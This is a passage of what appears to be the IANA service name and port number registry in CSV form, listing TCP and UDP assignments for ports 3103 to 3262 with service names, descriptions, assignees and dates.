Port,[Moshe_Livne],[Moshe_Livne],,,,,, autocuesmi,3103,tcp,Autocue SMI Protocol,,,,,,,, autocuesmi,3103,udp,Autocue SMI Protocol,,,,,,,, autocuelog,3104,tcp,Autocue Logger Protocol,,,,,,,, autocuetime,3104,udp,Autocue Time Service,[Geoff_Back],[Geoff_Back],,,,,, cardbox,3105,tcp,Cardbox,,,,,,,, cardbox,3105,udp,Cardbox,,,,,,,, cardbox-http,3106,tcp,Cardbox HTTP,[Martin_Kochanski],[Martin_Kochanski],,,,,, cardbox-http,3106,udp,Cardbox HTTP,[Martin_Kochanski],[Martin_Kochanski],,,,,, business,3107,tcp,Business protocol,,,,,,,, business,3107,udp,Business protocol,,,,,,,, geolocate,3108,tcp,Geolocate protocol,,,,,,,, geolocate,3108,udp,Geolocate protocol,,,,,,,, personnel,3109,tcp,Personnel protocol,[William_Randolph_Roy],[William_Randolph_Roy],,,,,, personnel,3109,udp,Personnel protocol,[William_Randolph_Roy],[William_Randolph_Roy],,,,,, sim-control,3110,tcp,simulator control port,[Ian_Bell],[Ian_Bell],,,,,, sim-control,3110,udp,simulator control port,[Ian_Bell],[Ian_Bell],,,,,, wsynch,3111,tcp,Web Synchronous Services,[Valery_Fremaux],[Valery_Fremaux],,,,,, wsynch,3111,udp,Web Synchronous Services,[Valery_Fremaux],[Valery_Fremaux],,,,,, ksysguard,3112,tcp,KDE System Guard,[Chris_Schlaeger],[Chris_Schlaeger],,,,,, ksysguard,3112,udp,KDE System Guard,[Chris_Schlaeger],[Chris_Schlaeger],,,,,, cs-auth-svr,3113,tcp,CS-Authenticate Svr Port,[Cliff_Diamond][Andy_Georgiou],[Cliff_Diamond][Andy_Georgiou],,,,,, cs-auth-svr,3113,udp,CS-Authenticate Svr Port,[Cliff_Diamond][Andy_Georgiou],[Cliff_Diamond][Andy_Georgiou],,,,,, ccmad,3114,tcp,CCM AutoDiscover,[Ram_Sudama],[Ram_Sudama],,,,,, ccmad,3114,udp,CCM AutoDiscover,[Ram_Sudama],[Ram_Sudama],,,,,, mctet-master,3115,tcp,MCTET Master,,,,,,,, mctet-master,3115,udp,MCTET Master,,,,,,,, mctet-gateway,3116,tcp,MCTET Gateway,,,,,,,, mctet-gateway,3116,udp,MCTET Gateway,,,,,,,, mctet-jserv,3117,tcp,MCTET Jserv,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, mctet-jserv,3117,udp,MCTET Jserv,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, pkagent,3118,tcp,PKAgent,[Michael_Douglass],[Michael_Douglass],,,,,, pkagent,3118,udp,PKAgent,[Michael_Douglass],[Michael_Douglass],,,,,, d2000kernel,3119,tcp,D2000 Kernel Port,,,,,,,, d2000kernel,3119,udp,D2000 Kernel Port,,,,,,,, d2000webserver,3120,tcp,D2000 Webserver Port,[Tomas_Rajcan],[Tomas_Rajcan],,,,,, d2000webserver,3120,udp,D2000 Webserver Port,[Tomas_Rajcan],[Tomas_Rajcan],,,,,, pcmk-remote,3121,tcp,The pacemaker remote (pcmk-remote) service extends high availability functionality outside of the Linux cluster into remote nodes.,[David_Vossel],[Andrew_Beekhof],,2013-03-15,,,,"port 3121 previously noted ""Removed on 2003-09-17""" ,3121,udp,Reserved,,,,2013-03-15,,,,"port 3121 previously noted ""Removed on 2003-09-17""" vtr-emulator,3122,tcp,MTI VTR Emulator port,[John_Mertus],[John_Mertus],,,,,, vtr-emulator,3122,udp,MTI VTR Emulator port,[John_Mertus],[John_Mertus],,,,,, edix,3123,tcp,EDI Translation Protocol,[William_Randolph_Roy],[William_Randolph_Roy],,,,,, edix,3123,udp,EDI Translation Protocol,[William_Randolph_Roy],[William_Randolph_Roy],,,,,, beacon-port,3124,tcp,Beacon Port,[James_Paul_Duncan],[James_Paul_Duncan],,,,,, beacon-port,3124,udp,Beacon Port,[James_Paul_Duncan],[James_Paul_Duncan],,,,,, a13-an,3125,tcp,A13-AN Interface,[Douglas_Knisely],[Douglas_Knisely],,,,,, a13-an,3125,udp,A13-AN Interface,[Douglas_Knisely],[Douglas_Knisely],,,,,, ,3126,,Unassigned,,,,2007-10-04,,,, ctx-bridge,3127,tcp,CTX Bridge Port,[Alexander_Dubrovsky],[Alexander_Dubrovsky],,,,,, ctx-bridge,3127,udp,CTX Bridge Port,[Alexander_Dubrovsky],[Alexander_Dubrovsky],,,,,, ndl-aas,3128,tcp,Active API Server Port,[Martin_Norman],[Martin_Norman],,,,,, ndl-aas,3128,udp,Active API Server Port,[Martin_Norman],[Martin_Norman],,,,,, netport-id,3129,tcp,NetPort Discovery Port,[P_T_K_Farrar],[P_T_K_Farrar],,,,,, netport-id,3129,udp,NetPort Discovery Port,[P_T_K_Farrar],[P_T_K_Farrar],,,,,, icpv2,3130,tcp,ICPv2,[Duane_Wessels],[Duane_Wessels],,,,,, icpv2,3130,udp,ICPv2,[Duane_Wessels],[Duane_Wessels],,,,,, netbookmark,3131,tcp,Net Book Mark,[Yiftach_Ravid],[Yiftach_Ravid],,,,,Known Unauthorized Use on port 3131, netbookmark,3131,udp,Net Book Mark,[Yiftach_Ravid],[Yiftach_Ravid],,,,,Known Unauthorized Use on port 3131, ms-rule-engine,3132,tcp,Microsoft Business Rule Engine Update Service,[Anush_Kumar],[Anush_Kumar],,,,,, ms-rule-engine,3132,udp,Microsoft Business Rule Engine Update Service,[Anush_Kumar],[Anush_Kumar],,,,,, prism-deploy,3133,tcp,Prism Deploy User Port,[Joan_Linck],[Joan_Linck],,,,,, prism-deploy,3133,udp,Prism Deploy User Port,[Joan_Linck],[Joan_Linck],,,,,, ecp,3134,tcp,Extensible Code Protocol,[Jim_Trek][Mark_Bocko],[Jim_Trek][Mark_Bocko],,,,,, ecp,3134,udp,Extensible Code Protocol,[Jim_Trek][Mark_Bocko],[Jim_Trek][Mark_Bocko],,,,,, peerbook-port,3135,tcp,PeerBook Port,[John_Flowers],[John_Flowers],,,,,, peerbook-port,3135,udp,PeerBook Port,[John_Flowers],[John_Flowers],,,,,, grubd,3136,tcp,Grub Server Port,[Kord_Campbell],[Kord_Campbell],,,,,, grubd,3136,udp,Grub Server Port,[Kord_Campbell],[Kord_Campbell],,,,,, rtnt-1,3137,tcp,rtnt-1 data packets,,,,,,,, rtnt-1,3137,udp,rtnt-1 data packets,,,,,,,, rtnt-2,3138,tcp,rtnt-2 data packets,[Ron_Muellerschoen],[Ron_Muellerschoen],,,,,, rtnt-2,3138,udp,rtnt-2 data packets,[Ron_Muellerschoen],[Ron_Muellerschoen],,,,,, incognitorv,3139,tcp,Incognito Rendez-Vous,[Stephane_Bourque],[Stephane_Bourque],,,,,, incognitorv,3139,udp,Incognito Rendez-Vous,[Stephane_Bourque],[Stephane_Bourque],,,,,, ariliamulti,3140,tcp,Arilia Multiplexor,[Stephane_Bourque_2],[Stephane_Bourque_2],,,,,, ariliamulti,3140,udp,Arilia Multiplexor,[Stephane_Bourque_2],[Stephane_Bourque_2],,,,,, vmodem,3141,tcp,VMODEM,[Ray_Gwinn],[Ray_Gwinn],,,,,, vmodem,3141,udp,VMODEM,[Ray_Gwinn],[Ray_Gwinn],,,,,, rdc-wh-eos,3142,tcp,RDC WH EOS,[Udi_Nir],[Udi_Nir],,,,,, rdc-wh-eos,3142,udp,RDC WH EOS,[Udi_Nir],[Udi_Nir],,,,,, seaview,3143,tcp,Sea View,[Jim_Flaherty_2],[Jim_Flaherty_2],,,,,, seaview,3143,udp,Sea View,[Jim_Flaherty_2],[Jim_Flaherty_2],,,,,, tarantella,3144,tcp,Tarantella,[Roger_Binns],[Roger_Binns],,,,,, tarantella,3144,udp,Tarantella,[Roger_Binns],[Roger_Binns],,,,,, csi-lfap,3145,tcp,CSI-LFAP,[Paul_Amsden],[Paul_Amsden],,,,,Known UNAUTHORIZED USE: port 3145, csi-lfap,3145,udp,CSI-LFAP,[Paul_Amsden],[Paul_Amsden],,,,,Known UNAUTHORIZED USE: port 3145, bears-02,3146,tcp,bears-02,[Bruce_McKinnon_2],[Bruce_McKinnon_2],,,,,, bears-02,3146,udp,bears-02,[Bruce_McKinnon_2],[Bruce_McKinnon_2],,,,,, rfio,3147,tcp,RFIO,[Frederic_Hemmer],[Frederic_Hemmer],,,,,, rfio,3147,udp,RFIO,[Frederic_Hemmer],[Frederic_Hemmer],,,,,, nm-game-admin,3148,tcp,NetMike Game Administrator,,,,,,,, nm-game-admin,3148,udp,NetMike Game Administrator,,,,,,,, nm-game-server,3149,tcp,NetMike Game Server,,,,,,,, nm-game-server,3149,udp,NetMike Game Server,,,,,,,, nm-asses-admin,3150,tcp,NetMike Assessor Administrator,,,,,,,, nm-asses-admin,3150,udp,NetMike Assessor Administrator,,,,,,,, nm-assessor,3151,tcp,NetMike Assessor,[Andrew_Sharpe],[Andrew_Sharpe],,,,,, nm-assessor,3151,udp,NetMike Assessor,[Andrew_Sharpe],[Andrew_Sharpe],,,,,, feitianrockey,3152,tcp,FeiTian Port,[Huang_Yu],[Huang_Yu],,,,,, feitianrockey,3152,udp,FeiTian Port,[Huang_Yu],[Huang_Yu],,,,,, s8-client-port,3153,tcp,S8Cargo Client Port,[Jon_S_Kyle],[Jon_S_Kyle],,,,,, s8-client-port,3153,udp,S8Cargo Client Port,[Jon_S_Kyle],[Jon_S_Kyle],,,,,, ccmrmi,3154,tcp,ON RMI Registry,[Ram_Sudama],[Ram_Sudama],,,,,, ccmrmi,3154,udp,ON RMI Registry,[Ram_Sudama],[Ram_Sudama],,,,,, jpegmpeg,3155,tcp,JpegMpeg Port,[Richard_Bassous],[Richard_Bassous],,,,,, jpegmpeg,3155,udp,JpegMpeg Port,[Richard_Bassous],[Richard_Bassous],,,,,, indura,3156,tcp,Indura Collector,[Bruce_Kosbab],[Bruce_Kosbab],,,,,, indura,3156,udp,Indura Collector,[Bruce_Kosbab],[Bruce_Kosbab],,,,,, e3consultants,3157,tcp,CCC Listener Port,[Brian_Carnell],[Brian_Carnell],,,,,, e3consultants,3157,udp,CCC Listener Port,[Brian_Carnell],[Brian_Carnell],,,,,, stvp,3158,tcp,SmashTV Protocol,[Christian_Wolff],[Christian_Wolff],,,,,, stvp,3158,udp,SmashTV Protocol,[Christian_Wolff],[Christian_Wolff],,,,,, navegaweb-port,3159,tcp,NavegaWeb Tarification,[Miguel_Angel_Fernand],[Miguel_Angel_Fernand],,,,,, navegaweb-port,3159,udp,NavegaWeb Tarification,[Miguel_Angel_Fernand],[Miguel_Angel_Fernand],,,,,, tip-app-server,3160,tcp,TIP Application Server,[Olivier_Mascia],[Olivier_Mascia],,,,,, tip-app-server,3160,udp,TIP Application Server,[Olivier_Mascia],[Olivier_Mascia],,,,,, doc1lm,3161,tcp,DOC1 License Manager,[Greg_Goodson],[Greg_Goodson],,,,,, doc1lm,3161,udp,DOC1 License Manager,[Greg_Goodson],[Greg_Goodson],,,,,, sflm,3162,tcp,SFLM,[System_Administrator],[System_Administrator],,,,,, sflm,3162,udp,SFLM,[System_Administrator],[System_Administrator],,,,,, res-sap,3163,tcp,RES-SAP,[Bob_Janssen],[Bob_Janssen],,,,,, res-sap,3163,udp,RES-SAP,[Bob_Janssen],[Bob_Janssen],,,,,, imprs,3164,tcp,IMPRS,[Lars_Bohn],[Lars_Bohn],,,,,, imprs,3164,udp,IMPRS,[Lars_Bohn],[Lars_Bohn],,,,,, newgenpay,3165,tcp,Newgenpay Engine Service,[Ilan_Zisser],[Ilan_Zisser],,,,,, newgenpay,3165,udp,Newgenpay Engine Service,[Ilan_Zisser],[Ilan_Zisser],,,,,, sossecollector,3166,tcp,Quest Spotlight Out-Of-Process Collector,[Greg_Cottman],[Greg_Cottman],2008-10-23,,,,, sossecollector,3166,udp,Quest Spotlight Out-Of-Process Collector,[Greg_Cottman],[Greg_Cottman],2008-10-23,,,,, nowcontact,3167,tcp,Now Contact Public Server,,,,,,,, nowcontact,3167,udp,Now Contact Public Server,,,,,,,, poweronnud,3168,tcp,Now Up-to-Date Public Server,[John_Wallace],[John_Wallace],,,,,, poweronnud,3168,udp,Now Up-to-Date Public Server,[John_Wallace],[John_Wallace],,,,,, serverview-as,3169,tcp,SERVERVIEW-AS,,,,,,,, serverview-as,3169,udp,SERVERVIEW-AS,,,,,,,, serverview-asn,3170,tcp,SERVERVIEW-ASN,,,,,,,, serverview-asn,3170,udp,SERVERVIEW-ASN,,,,,,,, serverview-gf,3171,tcp,SERVERVIEW-GF,,,,,,,, serverview-gf,3171,udp,SERVERVIEW-GF,,,,,,,, serverview-rm,3172,tcp,SERVERVIEW-RM,,,,,,,, serverview-rm,3172,udp,SERVERVIEW-RM,,,,,,,, serverview-icc,3173,tcp,SERVERVIEW-ICC,[Detlef_Rothe],[Detlef_Rothe],2009-05-15,,,,, serverview-icc,3173,udp,SERVERVIEW-ICC,[Detlef_Rothe],[Detlef_Rothe],2009-05-15,,,,, armi-server,3174,tcp,ARMI Server,[Bobby_Martin],[Bobby_Martin],,,,,, armi-server,3174,udp,ARMI Server,[Bobby_Martin],[Bobby_Martin],,,,,, t1-e1-over-ip,3175,tcp,T1_E1_Over_IP,[Mark_Doyle],[Mark_Doyle],,,,,, t1-e1-over-ip,3175,udp,T1_E1_Over_IP,[Mark_Doyle],[Mark_Doyle],,,,,, ars-master,3176,tcp,ARS Master,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, ars-master,3176,udp,ARS Master,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, phonex-port,3177,tcp,Phonex Protocol,[Doug_Grover],[Doug_Grover],,,,,, phonex-port,3177,udp,Phonex Protocol,[Doug_Grover],[Doug_Grover],,,,,, radclientport,3178,tcp,Radiance UltraEdge Port,[Sri_Subramaniam],[Sri_Subramaniam],,,,,, radclientport,3178,udp,Radiance UltraEdge Port,[Sri_Subramaniam],[Sri_Subramaniam],,,,,, h2gf-w-2m,3179,tcp,H2GF W.2m Handover prot.,[Arne_Norefors],[Arne_Norefors],,,,,, h2gf-w-2m,3179,udp,H2GF W.2m Handover prot.,[Arne_Norefors],[Arne_Norefors],,,,,, mc-brk-srv,3180,tcp,Millicent Broker Server,[Steve_Glassman],[Steve_Glassman],,,,,, mc-brk-srv,3180,udp,Millicent Broker Server,[Steve_Glassman],[Steve_Glassman],,,,,, bmcpatrolagent,3181,tcp,BMC Patrol Agent,,,,,,,, bmcpatrolagent,3181,udp,BMC Patrol Agent,,,,,,,, bmcpatrolrnvu,3182,tcp,BMC Patrol Rendezvous,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmcpatrolrnvu,3182,udp,BMC Patrol Rendezvous,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, cops-tls,3183,tcp,COPS/TLS,[Mark_Stevens],[Mark_Stevens],,,,,, cops-tls,3183,udp,COPS/TLS,[Mark_Stevens],[Mark_Stevens],,,,,, apogeex-port,3184,tcp,ApogeeX Port,[Tom_Nys],[Tom_Nys],,,,,, apogeex-port,3184,udp,ApogeeX Port,[Tom_Nys],[Tom_Nys],,,,,, smpppd,3185,tcp,SuSE Meta PPPD,[Arvin_Schnell],[Arvin_Schnell],,,,,, smpppd,3185,udp,SuSE Meta PPPD,[Arvin_Schnell],[Arvin_Schnell],,,,,, iiw-port,3186,tcp,IIW Monitor User Port,[Corey_Burnett],[Corey_Burnett],,,,,, iiw-port,3186,udp,IIW Monitor User Port,[Corey_Burnett],[Corey_Burnett],,,,,, odi-port,3187,tcp,Open Design Listen Port,[Phivos_Aristides],[Phivos_Aristides],,,,,, odi-port,3187,udp,Open Design Listen Port,[Phivos_Aristides],[Phivos_Aristides],,,,,, brcm-comm-port,3188,tcp,Broadcom Port,[Thomas_L_Johnson],[Thomas_L_Johnson],,,,,, brcm-comm-port,3188,udp,Broadcom Port,[Thomas_L_Johnson],[Thomas_L_Johnson],,,,,, pcle-infex,3189,tcp,Pinnacle Sys InfEx Port,[Anthon_van_der_Neut],[Anthon_van_der_Neut],,,,,, pcle-infex,3189,udp,Pinnacle Sys InfEx Port,[Anthon_van_der_Neut],[Anthon_van_der_Neut],,,,,, csvr-proxy,3190,tcp,ConServR Proxy,,,,,,,, csvr-proxy,3190,udp,ConServR Proxy,,,,,,,, csvr-sslproxy,3191,tcp,ConServR SSL Proxy,[Mikhail_Kruk],[Mikhail_Kruk],,,,,, csvr-sslproxy,3191,udp,ConServR SSL Proxy,[Mikhail_Kruk],[Mikhail_Kruk],,,,,, firemonrcc,3192,tcp,FireMon Revision Control,[Michael_Bishop],[Michael_Bishop],,,,,, firemonrcc,3192,udp,FireMon Revision Control,[Michael_Bishop],[Michael_Bishop],,,,,, spandataport,3193,tcp,SpanDataPort,[Jesse_McKay],[Jesse_McKay],,,,,, spandataport,3193,udp,SpanDataPort,[Jesse_McKay],[Jesse_McKay],,,,,, magbind,3194,tcp,Rockstorm MAG protocol,[Jens_Nilsson],[Jens_Nilsson],,,,,, magbind,3194,udp,Rockstorm MAG protocol,[Jens_Nilsson],[Jens_Nilsson],,,,,, ncu-1,3195,tcp,Network Control Unit,,,,,,,, ncu-1,3195,udp,Network Control Unit,,,,,,,, ncu-2,3196,tcp,Network Control Unit,[Charlie_Hundre],[Charlie_Hundre],,,,,, ncu-2,3196,udp,Network Control Unit,[Charlie_Hundre],[Charlie_Hundre],,,,,, embrace-dp-s,3197,tcp,Embrace Device Protocol Server,,,,,,,, embrace-dp-s,3197,udp,Embrace Device Protocol Server,,,,,,,, embrace-dp-c,3198,tcp,Embrace Device Protocol Client,[Elliot_Schwartz],[Elliot_Schwartz],,,,,, embrace-dp-c,3198,udp,Embrace Device Protocol Client,[Elliot_Schwartz],[Elliot_Schwartz],,,,,, dmod-workspace,3199,tcp,DMOD WorkSpace,[Nick_Plante],[Nick_Plante],,,,,, dmod-workspace,3199,udp,DMOD WorkSpace,[Nick_Plante],[Nick_Plante],,,,,, tick-port,3200,tcp,Press-sense Tick Port,[Boris_Svetlitsky],[Boris_Svetlitsky],,,,,, tick-port,3200,udp,Press-sense Tick Port,[Boris_Svetlitsky],[Boris_Svetlitsky],,,,,, cpq-tasksmart,3201,tcp,CPQ-TaskSmart,[Jackie_Lau],[Jackie_Lau],,,,,, cpq-tasksmart,3201,udp,CPQ-TaskSmart,[Jackie_Lau],[Jackie_Lau],,,,,, intraintra,3202,tcp,IntraIntra,[Matthew_Asham],[Matthew_Asham],,,,,, intraintra,3202,udp,IntraIntra,[Matthew_Asham],[Matthew_Asham],,,,,, netwatcher-mon,3203,tcp,Network Watcher Monitor,,,,,,,, netwatcher-mon,3203,udp,Network Watcher Monitor,,,,,,,, netwatcher-db,3204,tcp,Network Watcher DB Access,[Hirokazu_Fujisawa],[Hirokazu_Fujisawa],,,,,, netwatcher-db,3204,udp,Network Watcher DB Access,[Hirokazu_Fujisawa],[Hirokazu_Fujisawa],,,,,, isns,3205,tcp,iSNS Server Port,,,,,[RFC4171],,, isns,3205,udp,iSNS Server Port,,,,,[RFC4171],,, ironmail,3206,tcp,IronMail POP Proxy,[Mike_Hudack],[Mike_Hudack],,,,,, ironmail,3206,udp,IronMail POP Proxy,[Mike_Hudack],[Mike_Hudack],,,,,, vx-auth-port,3207,tcp,Veritas Authentication Port,[Senthil_Ponnuswamy],[Senthil_Ponnuswamy],,,,,, vx-auth-port,3207,udp,Veritas Authentication Port,[Senthil_Ponnuswamy],[Senthil_Ponnuswamy],,,,,, pfu-prcallback,3208,tcp,PFU PR Callback,[Tetsuharu_Hanada],[Tetsuharu_Hanada],,,,,, pfu-prcallback,3208,udp,PFU PR Callback,[Tetsuharu_Hanada],[Tetsuharu_Hanada],,,,,, netwkpathengine,3209,tcp,HP OpenView Network Path Engine Server,[Anthony_Walker],[Anthony_Walker],,,,,, netwkpathengine,3209,udp,HP OpenView Network Path Engine Server,[Anthony_Walker],[Anthony_Walker],,,,,, flamenco-proxy,3210,tcp,Flamenco Networks Proxy,[Corey_Corrick],[Corey_Corrick],,,,,, flamenco-proxy,3210,udp,Flamenco Networks Proxy,[Corey_Corrick],[Corey_Corrick],,,,,, avsecuremgmt,3211,tcp,Avocent Secure Management,[Brian_S_Stewart],[Brian_S_Stewart],,,,,, avsecuremgmt,3211,udp,Avocent Secure Management,[Brian_S_Stewart],[Brian_S_Stewart],,,,,, surveyinst,3212,tcp,Survey Instrument,[Al_Amet],[Al_Amet],,,,,, surveyinst,3212,udp,Survey Instrument,[Al_Amet],[Al_Amet],,,,,, neon24x7,3213,tcp,NEON 24X7 Mission Control,[Tony_Lubrano],[Tony_Lubrano],,,,,, neon24x7,3213,udp,NEON 24X7 Mission Control,[Tony_Lubrano],[Tony_Lubrano],,,,,, jmq-daemon-1,3214,tcp,JMQ Daemon Port 1,,,,,,,, jmq-daemon-1,3214,udp,JMQ Daemon Port 1,,,,,,,, jmq-daemon-2,3215,tcp,JMQ Daemon Port 2,[Martin_West],[Martin_West],,,,,, jmq-daemon-2,3215,udp,JMQ Daemon Port 2,[Martin_West],[Martin_West],,,,,, ferrari-foam,3216,tcp,Ferrari electronic FOAM,[Johann_Deutinger],[Johann_Deutinger],,,,,, ferrari-foam,3216,udp,Ferrari electronic FOAM,[Johann_Deutinger],[Johann_Deutinger],,,,,, unite,3217,tcp,Unified IP & Telecom Environment,[Christer_Gunnarsson],[Christer_Gunnarsson],2009-03-26,,,,, unite,3217,udp,Unified IP & Telecom Environment,[Christer_Gunnarsson],[Christer_Gunnarsson],2009-03-26,,,,, smartpackets,3218,tcp,EMC SmartPackets,[Steve_Spataro],[Steve_Spataro],,,,,, smartpackets,3218,udp,EMC SmartPackets,[Steve_Spataro],[Steve_Spataro],,,,,, wms-messenger,3219,tcp,WMS Messenger,[Michael_Monasterio],[Michael_Monasterio],,,,,, wms-messenger,3219,udp,WMS Messenger,[Michael_Monasterio],[Michael_Monasterio],,,,,, xnm-ssl,3220,tcp,XML NM over SSL,,,,,,,, xnm-ssl,3220,udp,XML NM over SSL,,,,,,,, xnm-clear-text,3221,tcp,XML NM over TCP,[Mark_Trostler],[Mark_Trostler],,,,,, xnm-clear-text,3221,udp,XML NM over TCP,[Mark_Trostler],[Mark_Trostler],,,,,, glbp,3222,tcp,Gateway Load Balancing Pr,[Douglas_McLaggan],[Douglas_McLaggan],,,,,, glbp,3222,udp,Gateway Load Balancing Pr,[Douglas_McLaggan],[Douglas_McLaggan],,,,,, digivote,3223,tcp,DIGIVOTE (R) Vote-Server,[Christian_Treczoks],[Christian_Treczoks],,,,,, digivote,3223,udp,DIGIVOTE (R) Vote-Server,[Christian_Treczoks],[Christian_Treczoks],,,,,, aes-discovery,3224,tcp,AES Discovery Port,[Ken_Richard],[Ken_Richard],,,,,, aes-discovery,3224,udp,AES Discovery Port,[Ken_Richard],[Ken_Richard],,,,,, fcip-port,3225,tcp,FCIP,,,,,[RFC3821],,, fcip-port,3225,udp,FCIP,,,,,[RFC3821],,, isi-irp,3226,tcp,ISI Industry Software IRP,[Peter_Sandstrom],[Peter_Sandstrom],,,,,, isi-irp,3226,udp,ISI Industry Software IRP,[Peter_Sandstrom],[Peter_Sandstrom],,,,,, dwnmshttp,3227,tcp,DiamondWave NMS Server,,,,,,,, dwnmshttp,3227,udp,DiamondWave NMS Server,,,,,,,, dwmsgserver,3228,tcp,DiamondWave MSG Server,[Varma_Bhupatiraju],[Varma_Bhupatiraju],,,,,, dwmsgserver,3228,udp,DiamondWave MSG Server,[Varma_Bhupatiraju],[Varma_Bhupatiraju],,,,,, global-cd-port,3229,tcp,Global CD Port,[Vitaly_Revsin_2],[Vitaly_Revsin_2],,,,,, global-cd-port,3229,udp,Global CD Port,[Vitaly_Revsin_2],[Vitaly_Revsin_2],,,,,, sftdst-port,3230,tcp,Software Distributor Port,[Andrea_Lanza],[Andrea_Lanza],,2014-02-21,,,, sftdst-port,3230,udp,Software Distributor Port,[Andrea_Lanza],[Andrea_Lanza],,2014-02-21,,,, vidigo,3231,tcp,VidiGo communication (previous was: Delta Solutions Direct),[Peter_Ijkhout],[Peter_Ijkhout],,,,,, vidigo,3231,udp,VidiGo communication (previous was: Delta Solutions Direct),[Peter_Ijkhout],[Peter_Ijkhout],,,,,, mdtp,3232,tcp,MDT port,,,,2012-02-21,[RFC6513],,, mdtp,3232,udp,MDT port,,,,2012-02-21,[RFC6513],,, whisker,3233,tcp,WhiskerControl main port,[Rudolf_Cardinal],[Rudolf_Cardinal],2002-02,,,,, whisker,3233,udp,WhiskerControl main port,[Rudolf_Cardinal],[Rudolf_Cardinal],2002-02,,,,, alchemy,3234,tcp,Alchemy Server,[Mikhail_Belov],[Mikhail_Belov],2002-02,,,,, alchemy,3234,udp,Alchemy Server,[Mikhail_Belov],[Mikhail_Belov],2002-02,,,,, mdap-port,3235,tcp,MDAP port,[Johan_Deleu],[Johan_Deleu],2002-02,,,,, mdap-port,3235,udp,MDAP Port,[Johan_Deleu],[Johan_Deleu],2002-02,,,,, apparenet-ts,3236,tcp,appareNet Test Server,,,,,,,, apparenet-ts,3236,udp,appareNet Test Server,,,,,,,, apparenet-tps,3237,tcp,appareNet Test Packet Sequencer,,,,,,,, apparenet-tps,3237,udp,appareNet Test Packet Sequencer,,,,,,,, apparenet-as,3238,tcp,appareNet Analysis Server,,,,,,,, apparenet-as,3238,udp,appareNet Analysis Server,,,,,,,, apparenet-ui,3239,tcp,appareNet User Interface,[Fred_Klassen],[Fred_Klassen],2002-02,,,,, apparenet-ui,3239,udp,appareNet User Interface,[Fred_Klassen],[Fred_Klassen],2002-02,,,,, triomotion,3240,tcp,Trio Motion Control Port,[Tony_Matthews],[Tony_Matthews],2002-02,,,,, triomotion,3240,udp,Trio Motion Control Port,[Tony_Matthews],[Tony_Matthews],2002-02,,,,, sysorb,3241,tcp,SysOrb Monitoring Server,[Jakob_Oestergaard],[Jakob_Oestergaard],2002-02,,,,, sysorb,3241,udp,SysOrb Monitoring Server,[Jakob_Oestergaard],[Jakob_Oestergaard],2002-02,,,,, sdp-id-port,3242,tcp,Session Description ID,[Greg_Rose_2],[Greg_Rose_2],2002-02,,,,, sdp-id-port,3242,udp,Session Description ID,[Greg_Rose_2],[Greg_Rose_2],2002-02,,,,, timelot,3243,tcp,Timelot Port,[David_Ferguson],[David_Ferguson],2002-02,,,,, timelot,3243,udp,Timelot Port,[David_Ferguson],[David_Ferguson],2002-02,,,,, onesaf,3244,tcp,OneSAF,[Gene_McCulley],[Gene_McCulley],2002-02,,,,, onesaf,3244,udp,OneSAF,[Gene_McCulley],[Gene_McCulley],2002-02,,,,, vieo-fe,3245,tcp,VIEO Fabric Executive,[James_Cox],[James_Cox],2002-02,,,,, vieo-fe,3245,udp,VIEO Fabric Executive,[James_Cox],[James_Cox],2002-02,,,,, dvt-system,3246,tcp,DVT SYSTEM PORT,,,,,,,, dvt-system,3246,udp,DVT SYSTEM PORT,,,,,,,, dvt-data,3247,tcp,DVT DATA LINK,[Phillip_Heil],[Phillip_Heil],2002-02,,,,, dvt-data,3247,udp,DVT DATA LINK,[Phillip_Heil],[Phillip_Heil],2002-02,,,,, procos-lm,3248,tcp,PROCOS LM,[Torsten_Rendelmann],[Torsten_Rendelmann],,,,,, procos-lm,3248,udp,PROCOS LM,[Torsten_Rendelmann],[Torsten_Rendelmann],,,,,, ssp,3249,tcp,State Sync Protocol,[Stephane_Beaulieu],[Stephane_Beaulieu],2002-02,,,,, ssp,3249,udp,State Sync Protocol,[Stephane_Beaulieu],[Stephane_Beaulieu],2002-02,,,,, hicp,3250,tcp,HMS hicp port,[Joel_Palsson],[Joel_Palsson],2002-02,,,,, hicp,3250,udp,HMS hicp port,[Joel_Palsson],[Joel_Palsson],2002-02,,,,, sysscanner,3251,tcp,Sys Scanner,[Dick_Georges],[Dick_Georges],2002-02,,,,, sysscanner,3251,udp,Sys Scanner,[Dick_Georges],[Dick_Georges],2002-02,,,,, dhe,3252,tcp,DHE port,[Fabrizio_Massimo_Fer],[Fabrizio_Massimo_Fer],2002-02,,,,, dhe,3252,udp,DHE port,[Fabrizio_Massimo_Fer],[Fabrizio_Massimo_Fer],2002-02,,,,, pda-data,3253,tcp,PDA Data,,,,,,,, pda-data,3253,udp,PDA Data,,,,,,,, pda-sys,3254,tcp,PDA System,[Jian_Fan],[Jian_Fan],2002-02,,,,, pda-sys,3254,udp,PDA System,[Jian_Fan],[Jian_Fan],2002-02,,,,, semaphore,3255,tcp,Semaphore Connection Port,[Jay_Eckles],[Jay_Eckles],2002-02,,,,, semaphore,3255,udp,Semaphore Connection Port,[Jay_Eckles],[Jay_Eckles],2002-02,,,,, cpqrpm-agent,3256,tcp,Compaq RPM Agent Port,,,,,,,, cpqrpm-agent,3256,udp,Compaq RPM Agent Port,,,,,,,, cpqrpm-server,3257,tcp,Compaq RPM Server Port,[Royal_King],[Royal_King],2002-02,,,,, cpqrpm-server,3257,udp,Compaq RPM Server Port,[Royal_King],[Royal_King],2002-02,,,,, ivecon-port,3258,tcp,Ivecon Server Port,[Serguei_Tevs],[Serguei_Tevs],2002-02,,,,, ivecon-port,3258,udp,Ivecon Server Port,[Serguei_Tevs],[Serguei_Tevs],2002-02,,,,, epncdp2,3259,tcp,Epson Network Common Devi,[Oishi_Toshiaki],[Oishi_Toshiaki],2002-02,,,,, epncdp2,3259,udp,Epson Network Common Devi,[Oishi_Toshiaki],[Oishi_Toshiaki],2002-02,,,,, iscsi-target,3260,tcp,iSCSI port,[IESG],[IETF_Chair],,2013-08-27,[RFC7143],,, iscsi-target,3260,udp,iSCSI port,[IESG],[IETF_Chair],,2013-08-27,[RFC7143],,, winshadow,3261,tcp,winShadow,[Colin_Barry],[Colin_Barry],,,,,, winshadow,3261,udp,winShadow,[Colin_Barry],[Colin_Barry],,,,,, necp,3262,tcp,NECP,[Alberto_Cerpa],[Alberto_Cerpa],,,,,, 